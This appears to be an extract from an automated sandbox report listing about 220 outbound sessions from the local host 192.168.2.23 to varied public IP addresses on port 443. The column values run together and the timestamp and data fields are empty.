                                                16397192.168.2.2344098138.105.52.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16398192.168.2.233664848.198.86.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16399192.168.2.2343838138.44.213.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16400192.168.2.233933035.72.253.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16401192.168.2.233328218.147.58.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16402192.168.2.2360896149.187.169.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16403192.168.2.23553942.66.152.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16404192.168.2.236000445.122.156.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16405192.168.2.233602434.66.35.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16406192.168.2.2345222165.214.26.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16407192.168.2.2360372134.130.160.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16408192.168.2.2341122161.119.199.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16409192.168.2.2334776204.123.87.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16410192.168.2.2337042144.0.247.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16411192.168.2.233283498.124.178.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16412192.168.2.234301286.220.126.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16413192.168.2.2354420154.174.107.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16414192.168.2.234368020.27.173.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16415192.168.2.2342954198.134.13.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16416192.168.2.2337550211.70.47.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16417192.168.2.234464650.214.132.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16418192.168.2.2344730136.209.64.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16419192.168.2.235043634.176.231.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16420192.168.2.2342792202.110.188.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16421192.168.2.233375686.197.129.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16422192.168.2.2342908134.58.53.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16423192.168.2.234383469.66.117.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16424192.168.2.2344210122.13.36.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16425192.168.2.2359854188.96.32.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16426192.168.2.2357930163.191.78.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16427192.168.2.234594091.117.101.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16428192.168.2.235406890.38.175.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16429192.168.2.2354012197.178.147.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16430192.168.2.233758477.183.219.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16431192.168.2.2350512218.156.171.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16432192.168.2.2360266197.13.179.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16433192.168.2.2337508103.30.10.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16434192.168.2.2344504213.159.134.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16435192.168.2.2352832170.98.253.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16436192.168.2.2340534128.43.242.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16437192.168.2.235775485.65.59.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16438192.168.2.2336234126.65.98.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16439192.168.2.2342632116.61.184.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16440192.168.2.234721070.117.117.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16441192.168.2.2336818123.61.218.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16442192.168.2.233466258.65.224.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16443192.168.2.2336052210.22.12.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16444192.168.2.233517636.236.14.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16445192.168.2.234872419.103.214.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16446192.168.2.2334544115.16.23.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16447192.168.2.2346306160.191.237.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16448192.168.2.235517087.48.66.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16449192.168.2.2356030188.88.96.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16450192.168.2.235418043.101.143.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16451192.168.2.2342748176.142.185.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16452192.168.2.233649213.92.89.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16453192.168.2.2344752187.151.60.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16454192.168.2.2357216169.9.78.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16455192.168.2.2336626175.65.188.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16456192.168.2.2340664217.172.55.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16457192.168.2.235787837.145.203.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16458192.168.2.2338604119.15.79.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16459192.168.2.233633457.116.98.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16460192.168.2.2342800165.236.27.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16461192.168.2.2350440206.255.213.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16462192.168.2.2354516110.62.8.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16463192.168.2.233665246.33.131.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16464192.168.2.234117447.29.39.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16465192.168.2.234890469.206.96.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16466192.168.2.235882225.68.101.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16467192.168.2.2357472102.100.150.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16468192.168.2.2335840203.227.38.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16469192.168.2.2349584206.19.56.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16470192.168.2.234292088.145.21.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16471192.168.2.235307031.169.176.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16472192.168.2.233385447.53.190.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16473192.168.2.235005477.216.39.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16474192.168.2.2347044143.10.65.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16475192.168.2.23463122.183.139.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16476192.168.2.2338232185.204.214.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16477192.168.2.2350460120.14.84.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16478192.168.2.2356216130.242.139.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16479192.168.2.233606491.141.47.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16480192.168.2.2346972175.46.114.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16481192.168.2.234264876.133.175.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16482192.168.2.2337292173.122.238.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16483192.168.2.2350696153.181.141.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16484192.168.2.235641496.68.168.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16485192.168.2.2341306203.101.126.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16486192.168.2.2337002139.168.205.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16487192.168.2.2338006196.154.31.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16488192.168.2.2347042117.137.98.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16489192.168.2.234437688.172.156.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16490192.168.2.233400269.28.210.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16491192.168.2.2358352185.61.154.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16492192.168.2.235886434.145.99.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16493192.168.2.233740091.203.212.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16494192.168.2.2333112161.9.59.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16495192.168.2.235168269.16.247.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16496192.168.2.235228817.26.3.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16497192.168.2.233609449.76.184.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16498192.168.2.235869094.47.128.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16499192.168.2.235405281.230.210.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16500192.168.2.2334614143.84.189.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16501192.168.2.2343602175.228.130.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16502192.168.2.2346358187.253.96.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16503192.168.2.235633099.203.29.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16504192.168.2.235851099.227.67.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16505192.168.2.2341262217.180.184.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16506192.168.2.2360666182.81.220.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16507192.168.2.2355138217.11.217.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16508192.168.2.23436544.71.32.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16509192.168.2.235290279.196.89.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16510192.168.2.235623691.173.86.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16511192.168.2.233776261.182.88.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16512192.168.2.233794267.13.160.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16513192.168.2.2334576111.212.150.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16514192.168.2.2353572113.69.179.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16515192.168.2.234495047.132.165.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16516192.168.2.235679060.112.64.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16517192.168.2.2352582186.82.8.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16518192.168.2.2333250181.215.44.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16519192.168.2.2360452142.80.216.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16520192.168.2.2339748154.28.5.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16521192.168.2.2346020190.103.171.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16522192.168.2.233837478.61.189.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16523192.168.2.23453968.210.22.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16524192.168.2.234726227.238.43.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16525192.168.2.235820641.33.79.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16526192.168.2.2359784175.86.40.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16527192.168.2.233472047.177.125.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16528192.168.2.2343900197.170.121.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16529192.168.2.233613840.108.58.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16530192.168.2.2342466141.217.181.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16531192.168.2.23400169.241.47.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16532192.168.2.2355418119.15.120.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16533192.168.2.2352056195.193.235.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16534192.168.2.235639068.63.206.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16535192.168.2.2333438120.18.112.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16536192.168.2.2338714148.116.96.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16537192.168.2.2337674142.171.38.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16538192.168.2.235927893.138.53.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16539192.168.2.2353472149.148.240.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16540192.168.2.2345956196.177.141.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16541192.168.2.2338988160.92.140.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16542192.168.2.2351826177.102.110.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16543192.168.2.234064866.55.33.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16544192.168.2.2338950103.207.110.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16545192.168.2.2353766207.249.192.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16546192.168.2.2338130136.210.29.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16547192.168.2.234322097.230.248.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16548192.168.2.234105220.17.75.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16549192.168.2.2350632169.213.180.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16550192.168.2.2335922134.249.167.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16551192.168.2.2360206110.72.234.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16552192.168.2.234368491.224.3.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16553192.168.2.235202688.59.10.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16554192.168.2.2346580202.146.172.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16555192.168.2.233926443.77.133.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16556192.168.2.23510444.118.124.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16557192.168.2.234105247.213.200.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16558192.168.2.233886073.7.46.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16559192.168.2.233739254.151.233.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16560192.168.2.2342942209.70.123.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16561192.168.2.234560660.104.243.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16562192.168.2.234341650.134.201.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16563192.168.2.2345896140.117.215.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16564192.168.2.236018834.163.38.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16565192.168.2.2356948190.120.88.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16566192.168.2.2359810182.209.1.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16567192.168.2.2335882203.65.69.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16568192.168.2.233334051.97.251.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16569192.168.2.2353812126.147.97.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16570192.168.2.2342128186.151.222.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16571192.168.2.235588620.156.235.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16572192.168.2.2336186122.170.164.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16573192.168.2.2355178165.174.33.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16574192.168.2.233834242.227.173.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16575192.168.2.2359270170.252.159.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16576192.168.2.2337562185.42.209.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16577192.168.2.2359742219.127.101.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16578192.168.2.2347872164.167.19.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16579192.168.2.2335592216.140.33.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16580192.168.2.235512457.2.26.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16581192.168.2.2345564102.90.22.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16582192.168.2.2354708122.106.161.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16583192.168.2.2350096184.68.27.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16584192.168.2.235497862.93.45.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16585192.168.2.233964245.151.40.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16586192.168.2.2358508208.8.54.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16587192.168.2.2350510220.222.157.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16588192.168.2.2342316181.250.169.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16589192.168.2.2337838128.116.69.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16590192.168.2.235319879.22.103.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16591192.168.2.235530437.141.230.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16592192.168.2.2359060157.136.207.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16593192.168.2.2346012107.187.51.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16594192.168.2.234159097.218.125.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16595192.168.2.2358928205.213.253.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16596192.168.2.235466252.113.222.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16597192.168.2.2355858157.208.93.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16598192.168.2.2348890109.77.95.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16599192.168.2.233402665.82.206.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16600192.168.2.23386922.194.71.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16601192.168.2.2335374155.169.111.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16602192.168.2.233915638.82.175.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16603192.168.2.23552229.32.52.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16604192.168.2.235480682.56.169.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16605192.168.2.234980885.208.5.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16606192.168.2.236039219.57.230.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16607192.168.2.233754275.211.15.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16608192.168.2.2336268145.42.207.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16609192.168.2.235443859.121.22.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16610192.168.2.2360492221.104.204.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16611192.168.2.23396768.109.140.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16612192.168.2.234680873.86.144.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16613192.168.2.234222248.115.200.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16614192.168.2.234579669.12.221.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16615192.168.2.2335098138.212.199.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16616192.168.2.2360774196.246.87.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16617192.168.2.235416038.209.175.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16618192.168.2.2335902157.236.9.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
